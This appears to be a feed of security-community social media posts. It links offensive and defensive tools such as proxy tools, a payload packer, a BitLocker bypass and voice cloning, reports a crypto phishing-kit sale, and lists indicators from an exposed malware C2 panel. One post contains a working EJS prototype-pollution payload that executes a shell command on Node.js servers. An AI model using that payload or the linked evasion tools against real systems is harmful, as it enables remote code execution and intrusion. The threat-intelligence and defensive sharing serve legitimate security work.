71 security skills and 681 patterns for Claude Code github.com/elementalsouls/Cl…

Creates isolated browser profiles with spoofed fingerprints github.com/zhom/donutbrowser

Valid Burpsuite alternative github.com/skuntir/proxer

Turns ESP32 into universal hardware hacking tool github.com/geo-tp/ESP32-Bit-…

🚨 CYBER INTELLIGENCE ALERT: 🌐 [UNCONFIRMED / CRITICAL] PHISHING-AS-A-SERVICE TOOL FOR CRYPTOCURRENCY THEFT FOR SALE — THREAT MARKET [STATUS: UNCONFIRMED / CYBERCRIME ECOSYSTEM / GLOBAL FINANCIAL FRAUD] A post has been detected on clandestine Telegram channels where the threat actor calling itself "Threat Market" is selling an advanced phishing tool (Phishing-as-a-Service or PhaaS) called "Page Builder." This kit is specifically designed to steal critical credentials and seed phrases from major cryptocurrency platforms and wallets worldwide. Threat Actor: Threat Market Threat Vector: Automated and customizable phishing (Page Builder). Technological/Financial Targets: MetaMask, Trust Wallet, Coinbase, Binance, and Ledger devices. 📂 Technical Analysis of the Tool (Page Builder) According to the screenshots and technical specifications promoted by the attacker, the tool drastically lowers the barrier to entry for cybercriminals with limited technical knowledge, offering the following capabilities: Optimized Design (Mobile-Friendly): The templates are designed with a focus on mobile devices (where most users interact with their Web3 wallets), perfectly replicating the security verification interfaces of legitimate brands like Trust Wallet. Critical Data Extraction: The configuration panel allows the generation of pages that capture wallet addresses, unified PIN codes, and, most critically, 12- to 24-word recovery phrases (the primary vector for taking complete control and irreversibly draining funds). Personalization and Evasion: The ability to "use personal styles and logos" allows attackers to tailor pages for highly targeted spear-phishing campaigns or to impersonate emerging Decentralized Finance (DeFi) and Web3 projects. ⚠️ Risk Considerations and Financial Impact Direct extraction of seed phrases allows threat actors to quickly move underlying assets laterally. This accelerates the money laundering cycle through mixers or cross-chain bridges, increasing the complexity of financial investigations and the technical forensic tracing of illicit capital flows (especially in BTC and USDT). 🛡️ Recommended Actions (Tactical and Investigative Level) Domain Monitoring and Detection (Typosquatting): Deploy proactive alerts in institutional and third-party brand monitoring systems (Coinbase, Binance, MetaMask) to detect the recent registration of homoglyphic domains or anomalous SSL certificates that may be hosting templates generated by this "Page Builder". Forensic Analysis of Templates: If one of these fraudulent pages is intercepted online, reverse engineer the source code (HTML/JS) to identify the data collection endpoints (such as Telegram webhooks or C2 exfiltration panels) used by the tool. This would allow for the interruption of the flow of stolen data. #CyberSecurity 🔐 #ThreatIntelligence 📊 #Phishing 🎣 #CryptoSecurity 🪙 #PhaaS #DarkWeb 🕸️ #VECERT 🏢

Windows Event IDs for Defenders

"The Art of Evasion" talk at #x33fcon by @ShitSecure - x33fcon.com/#!s/FabianMosch.…

yo ho ho and a bottle of rum

At #x33fcon currently @_ar0x4 presenting "#Tunnel Vision: What #Microsoft's Secure Edge Can't See" - x33fcon.com/#!/s/ArshiaReisi… - #red, #purple, #research, #windows

😍😍😍

KRONIKIER If you haven’t been able to find the contact details on a particular website today, that doesn’t mean they’ve never been there The Internet Archive API and Kronikier may find contact details that have been removed very quickly github.com/soxoj/kronikier Creator @soxoj_insides

🚨 Security researcher, Nightmare Eclipse, has released another BitLocker bypass vulnerability called GreatXML. GitHub: github.com/MSNightmare/Great…

Adversary simulation platform with integrated LLM agent github.com/FunnyWolf/Viper

After “The Art of Evasion” @x33fcon I’m publishing NimSyscallPacker to the public. This is the most advanced public Packer/Loader I’m aware of: github.com/S3cur3Th1sSh1t/Ni…

Pre-built Jailbroken iOS 26 iPhone fully Run on VM Full virtual iPhone ready-to-run jailbroken iPhone (rootless Sileo Filza TrollStore vibes). (iOS 26.1 PCC-based) already jailbroken bootstrapped few popular tweaks pre-installed. No more painful QEMU/VZ setup from scratch. Just download, follow 3 4 steps and you’re inside a real iOS environment on your Mac. Test tweaks, exploit PoCs, debug without touching your daily driver. 16 GB RAM recommended - github.com/34306/vphone-aio

You can now clone any voice on a 4GB GPU & CPU😗 Open-source LuxTTS, It clones voices from 3 seconds of audio at 150x realtime speed. Fits in 1GB VRAM. Faster than realtime even on CPU. 48khz output vs industry standard 24khz Clone any voice locally Works on GPU and CPU - github.com/ysharma3501/LuxTT…

Runs macOS on AMD and Intel computers via Proxmox github.com/luchina-gabriel/O…

🕸️ Hetty — Open-source alternative to Burp Suite Pro for security researchers and bug bounty hunters. Key features: • MITM HTTP proxy • Request/response interception • Manual request editor & replay • Advanced search & logging • Scope management • Web-based UI • Project-based storage Built in Go, lightweight, and focused on modern web app testing. 🔗 github.com/dstotijn/hetty #BugBounty #Pentesting #AppSec #CyberSecurity #Infosec #Hetty

Node.js RCE via EJS (<v6.0.0-alpha) Unsafe merge - Prototype Pollution leading to RCE via template rendering. {"__proto__":{"client":true,"escapeFunction":"function(){return process.mainModule.require('child_process').spawnSync('id').stdout;};//"}} #node #rce #cfbypass

Exposed C2 Panel - #TeslaC2 MaaS An open directory leaking a full Malware-as-a-Service C2 framework. Infrastructure: cloud-dash[.]xyz - 185.246.190.217 (C2 Panel) cdn-telemetry-relaynn[.]online (beacon DNS tunnel) C2 DB snapshot: • 98 infected hosts • 625 stolen credentials • 921 screenshots Capabilities: BYOVD (RTCore64.sys), Ransomware, XMRig miner, ClickFix , LSASS dump, DNS tunnel, SOCKS5, lateral movement, reflective DLL, BOF, token theft — 50 commands Operator OPSEC fail: infected their own dev machine — real emails & XMR wallet leaked via their own keylogger Hashes: 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd 0851beaccaa81aaec0a1df819b05f26a002feba0ce7bfeb6de376d60ea4c6668 6adcc5eac3a3c4ec11b7c3093bd7af109db76b15a1d3c5d68d5ceba8fe6a7a96 806208644b10490204f2587be049f5563c88f8870b4db6aa79eb9b1b1bd5e04b 4193d5501148bf876a0d045bbd757a3b1f8f7d71c143780601ec5cd853a9bd35 bf967db4628e8b8d733353a4cc70858e18997a4f7c755da8cca55e52c03f8ce4 0108e2149537ec3b80f5fde7dfe0282f7d2c0f7cdbe06f5256ae83d0d5c754e3 87981f68e6b2838f8ed4a03ecd8d6acbd14e08057c3c51ff2090b31b3089e5e1 97d6b1019d3c3f06416c1a87ce77a11a10050cf8807c374e5557380c0b036544 30633e062e3f2d7a996b29e670914c1f52a237a76903fc0e982a5ac8f7febd53 a0b3c399336d9c5c580ac7eda19b4cc80557e4a004ff3d64f86d29a8e463b5ce 2175fdeeeabb327f4ec7b842763d0b06246c5016f39dc3b3744fab32e779d93f 61b5e012c8500e0bcbe89ec9adf93e3efdc409a621daff45c8b66e8a02ad9df2 b13c41823f7d690622202e5d2385465b125a7ccbca563909642da916ba49942e f66088b710cb5266272ea7de50606ddc8c79e0ec3bd216f5c7b5221523a96112 99bfaa5007d78c2c1ce78008eef57f2883e03fabcb512fe487a705d119d47e4d 3570bcc724d692a10ba557cc5bbd5f9c337606c76cb116bd1c675f7eddab95d1 b3a60a0b7301da4d741d4a2d778720724bab6b34d288bba70e945f4f1a3cef0f @malwrhunterteam @500mk500 @JAMESWT_WT @ViriBack #ThreatIntel #MaaS #C2 #ClickFix #DFIR